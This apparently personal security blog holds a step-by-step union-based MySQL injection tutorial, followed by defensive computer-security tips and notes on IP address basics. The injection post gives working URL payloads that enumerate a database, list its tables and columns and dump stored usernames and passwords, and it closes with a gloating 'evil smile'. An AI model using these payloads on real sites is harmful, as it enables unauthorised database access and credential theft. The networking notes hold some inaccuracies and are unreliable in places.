Friday 25 December 2015

UNION BASED MYSQL INJECTION

UNION BASED MYSQL INJECTION ---
This blog is only educational purpose. please do not use the skills gained from this blog to harm or attack or even test otherwise/sites/etc to which you do not have the permission.it is illegal to do so.if you get caught & mind you (you would) then don't say that you did not know. you have been specially warned.
Step 1: find a dynamic page

site.com/page.php?x=y

Step 2: apply ' to check if website is vulnerable or not

site.com/page.php?xid=76'

now the websiite must give you some signs of error like:
SQL error, php error, custom error, page not found, page redirect, blank page, data missing from page, etc

Step 3: Confirm if website is vulnerabke and find the injection type 
(string / integer) by applying --+

site.com/page.php?xid=76'--+

if no error then injection type is string else try removing '

site.com/page.php?xid=76--+

now normal page should open and it means injection type is integer, if still it dosent try another link

NOTE* if injection type is string 

site.com/page.php?xid=76' [sql injection here]--+
      
      if injection type is integer

site.com/page.php?xid=76 [sql injection here]--+

Step 4: get the number of columns in current query using order by (assuming injection type string)

site.com/page.php?xid=76' order by 1--+  no error
site.com/page.php?xid=76' order by 2--+  no error
site.com/page.php?xid=76' order by 3--+  no error
.
.
site.com/page.php?xid=76' order by n--+   error

this means number of columns=n-1

Step 5: find the visibble/vulnerable columns (assuming no of columns=4)

site.com/page.php?xid=76' union select 1,2,3,4--+

now you must see some or all of these numbers (the number that are visible are vulnerable and can be used to get more info)

NOTE* if you dont see any numbers try putting a - sign

site.com/page.php?xid=-76' union select 1,2,3,4--+

if still no numbers then try another type of injection

Step 6: get the name of the database, version and mysql user (assuming column 2 and 3 are visible)

site.com/page.php?xid=76' union select 1,concat_ws(0x3a3a,database(),version(),user()),3,4--+

Step 7: get the names of the tables (assuming database name is xyz)

site.com/page.php?xid=76' union select 1,table_name,3,4 from information_schema.tables where table_schema='xyz' --+

note* if you only get a single row use group_concat(table_name) instead of table_name

Step 8: get the names of columns (assuming table name is users)

site.com/page.php?xid=76' union select 1,column_name,3,4 from information_schema.columns where table_schema='xyz' and tabe_name='users'--+

Step 9: get the data (assuming column name is user_name and user_pass)

site.com/page.php?xid=76' union select 1,group_concat(user_name,0x3a3a,user_pass),3,4 from xyz.users--+

Step 10: evil smile 3:)

     

Wednesday 23 December 2015

KUNAL TECH WORLDS: SQL INJECTION INTRODUCTION

KUNAL TECH WORLDS: SQL INJECTION INTRODUCTION: SQL INJECTION INTRODUCTION-- SQL Injection is the most common vulnerability on the internet. It is mainly flaw in the web applicati...

Monday 30 November 2015

KUNAL TECH WORLDS: WPA/WPA2 WIFI CRACKING --

KUNAL TECH WORLDS: WPA/WPA2 WIFI CRACKING --: WPA/WPA2  wifi cracking- This blog is only educational purpose. please do not use the skills gained from this blog to harm or attack or e...

Thursday 17 September 2015

KUNAL TECH WORLDS: Cyber security terms you really need to know -

KUNAL TECH WORLDS: Cyber security terms you really need to know -:   1.Anti-spyware Software    --        Anti-spyware software is used in detecting, blocking and/or removing spyware attempts. ...

Thursday 10 September 2015

STEPS TO IMPROVE YOUR COMPUTER SECURITY

STEPS TO IMPROVE YOUR COMPUTER SECURITY -





1.Use strong password to your E-mail & social media account -
  • There are few things you need to pay attention to when we dealing with setting a good password for your online account. First of all ,don't use the same password in more than one online account ! 
  • The reason is quite easy - if one of your online account is hacked ,then others will soon follow.By using different password,you reduce the potential loss you could suffer in case privacy breach take place.
  • one of the best step to ensure your online account are not accessed by anyone else,but you is the use 2 step verification methods. Activating this method you will have to enter ,besides your credentials,a code send to your phone.
  • using this methods you can protect your private information from social media account or important data from your email account.
2.Stay safe from spyware threat with specialized security solution -
  •  first of all the question is - what is spyware?? spyware refers to software which is capable of installing on your computer & starts the opening pop-up windows,& redirect your browser to malicious webpages/website.& can be monitoring your browsing sessions affecting your private internet connections.
  • few signs which are --
  1. computer is slow when opening the programs or running some application.
  2. pop-up new window appear at all the time.
  3. a new toolbar may be appeared in your browser.
  4. the home page of your browser has been modified.
  5. the search engine of your browser has been changed.
  6. error msg are start to appear unexpectedly.
  • to stay safe from the spyware---
  1. use one of the antispyware product available online .A few security solution that removing the spyware from your system such as malwarebyte,spybot search & destroy etc...
  2. At the same time simply follow some security practices such as, don't click any suspecious window or any pop-up windows.,don't answer of unexpected answer or simply choose NO.
  3. & the most important part is ,Be aware when downloading any application.
3.Keep your operating system & vulnerable application up to date -
  • many people reads the many security news regarding the software vulnerability ,but many people don't take these news seriously,since most of the security solution is created for the malicious software.
  • But software vulnerability are not something you can ignore,taking the advantage of software vulnerability presnt in the particular/popular program & application is a popular method use by online criminals.
  • if you know you use the popular software like JAVA,ADOBE FLASH,ADOBE READER etc or popular web-browser like Mozilla Firefox ,chrome etc.always make sure you have the latest available patches.
  • you need to understand that these software solutions are always under threat from criminal minds,so don't relay on your memory & install a dedicated solution to perform these actions for you.
 4. Use standard user account in your windows operating system to go online -
  • In windows operating system,different level of rights privileges are available for different user account.
  • If you use standard windows account for accessing the internet,you make sure that a piece of malware which could infect your limited user account will not capable of doing great damage to your system.
  • Only administrator account can make significant changes to your system ,such as like deleting the important window related files or installing malicious software. If you use the standard account you will have to provide the credentials for administrator account every time you make important.changes.
5.Go online with your secure browser -
  • your web browser is the main tool for accessing the internet & you should pay a great deal attention secure it correctly. at the same time ,vulnerabilities from the web-browser are like open invitation to the hackers.By using these open doors ,online criminal attempts to retrieve private data from your system.
  • To secure your online privacy ,you can follow these-
  1. choose the latest version of your browser & make sure you have latest security patches installed.This important & keep your system secure from online online criminals attacks.
  2. incerase your privacy & security setting in your browser.
  3. choose the private browsing sessions when you accessing a website you are not sure about.choosing these navigation mode will prevent your browsing session details from being stored.
  4. use the secure website for sensitive financial operations.To visit a secure website ,make sure the web starts with "https:// " where the "s" comes from the "secure socket layer" & it indicate that you are connected to the website where data ,which is send & receive is in encrypted format.
6.Don't trust public & free WI-fi networks -
  • Be careful when connecting public/free wifi networks.one of the favorite methods used by the online criminal to retrieve your credential by wireless sniffers to access data sent over the unprotected network.
  • One way to increase your security is by using "private browsing sessions".
  • with the increasing danger of online theft & lack of privacy on popular social platform such as Facebook,you need to safeguard your freedom & protect your activity.One way of keeping your browsing session private & secure is to use a VPN (virtual private network) .
7.Check the link before you click it -
  • phishing that are usually done by the email messages that are apparently come from the financial institution or well known banking website. these attempt to retrieve private information from a user provide links in the message that direct the victim to a fake web location,that are controlled by online criminals.
  • To make sure you won't infected by clicking on dangerous links -however mouse over the link to see if you are directed to legitimate location. if you suppose to reach your online banking website,but the link indicate "http://freehifro.net "then you should not click on the link.
  • To make sure you are going to right direction -use a free tool such as redirect detective.this tool will allow you to see the complete path of the redirected link.Another tool which can provide very helpful checking suspicious link is the reliable URL checker ,VirusTotal.
8.Don't forgot log-out your account -
  • Don't simply close your browser when you are done with your financial operation or when you are exit your online account.
  • you need to remember that you have to log-out from your online account. If you don't do this ,especially if you are in public location,the next person who are open the facebook account ,for example will access directly your facebook profile.
9.Don't post private information on your social media account -
  • Exposing personal details may lead hacker into finding your financial information.
10.Don't access questionable web locations -
  • Don't access download content from unknown locations.Access website that are prove to be safe & you know you can trust.
  • nevertheless,this is not guarantee you won't infected.Now a days cyber criminals exploits vulnerabilities in legitimate website & inject the malicious code,as to perform drive by attacks on unsuspecting visitors.
  • It may be a free screen saver /browsing toolbar that may infect you with keylogger ,that can be specially used for records & send your personal data to cyber criminals.
  • To make sure your system is protected  & yor credentials are not exposed ,install a security product. which can detect & stop hackers from stealing valuable information from your system.
                          stay safe!!!!!

Wednesday 4 March 2015

IP ADDRESS & ITS BASIC ONLY

IP ADDRESS & ITS BASIC ONLY



What is IP address?
--- > internet protocol address is unique logical address assigned to every node(machine) uniquely.
--->  identify & communicate that node.
--> it is the s/w address


Classification on the basis of -->

  1. VERSION-->

 2. NETWORK--->
  • Internal/private/local network
 
  • external/public/global 
 
  • static & dynamic ip address
 
  • a.static  ip address-->it remain same forever


    b.dynamic  ip address changes on every reconnection.


    Note-  DHCP server provide the external IP address.


    1. Internal IP address & external IP address
               ---->Internal IP address is used for the internal /local communication only. it is not used for the out side world communication.
 Eg -if router placed in the home,then those device access the wifi  of that particular router  have the  run on the internal ip address. Which is provided by that router.
                    
                --->External IP address is used for the internet communication.

Eg- Lan connected to the router ,provide the external ip address to the router only.

              2.NAT - (Network Address Translation)
--->
n/w  address translation is a process using which a collection of the nodes(n/w) can be assign a single ip address called external IP address.& nodes can be communicate with each other using their Internal IP address,it has both financial & security benefits.

--->
In a crux:: one (single) ip address is used to provide internet access to all the device in the network,which cut the cost  with huge number & also anybody from outside the private network can not be connect to the internal device directly which adds the layer of the security.

--->
it  is also called a process that creates a sub-network of network.(subnetting).

                3.RESERVED IP ADDRESS-


 


Note-
127.0.0.1 ------------>loop back IP address
192.168.255.255 ------>to send packet broadcasting use
192.168.255.255 ------>broadcast the subnet 2 or more.
Default gateway address--->shows the router ip address

                4.MAC ADDRESS-

---->it is a 6 byte hexadecimal address,with 6 parts
---->separated by ‘:’ or ‘-‘  & each part is hexadecimal between 00-ff
---->eg-2c:b0:5d:d7:8f:2a
----->first three parts are the manufacture parts & the last 3 parts are the unique no.